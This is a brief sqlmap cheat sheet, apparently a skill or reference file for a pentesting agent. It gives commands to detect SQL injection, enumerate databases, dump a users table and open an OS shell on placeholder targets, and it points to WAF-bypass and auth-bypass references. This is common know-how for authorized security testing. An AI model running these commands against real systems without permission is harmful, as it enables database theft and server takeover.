aeondave/sqlmap

sqlmap

Automated SQL injection detection and exploitation.

Quick Start

sqlmap -u "http://target.com/search?id=1" --dbs
sqlmap -u "http://target.com/login" --data="user=admin&pass=test" --dbs
sqlmap -r request.txt --dbs
sqlmap -u "http://target.com/?id=1" -D mydb -T users --dump

Core Flags

| Flag | Purpose | |------|---------| | -u <url> | Target URL with parameter | | -r <file> | Saved HTTP request (Burp format) | | --data <data> | POST body | | --cookie <cookie> | Session cookie | | --dbs | Enumerate databases | | -D <db> | Select database | | -T <table> | Select table | | --dump | Dump table data | | --dump-all | Dump all databases | | --os-shell | Get OS shell | | --level <1-5> | Test depth (default 1) | | --risk <1-3> | Risk level of tests (default 1) | | --batch | Non-interactive, use defaults | | -p <param> | Test specific parameter only | | --threads <n> | Parallelism | | --proxy <proxy> | Route through proxy |

OS Shell

sqlmap -u "http://target.com/?id=1" --os-shell --technique=U

Resources

| File | When to load | |------|--------------| | references/ | Auth bypass, WAF bypass, tamper scripts |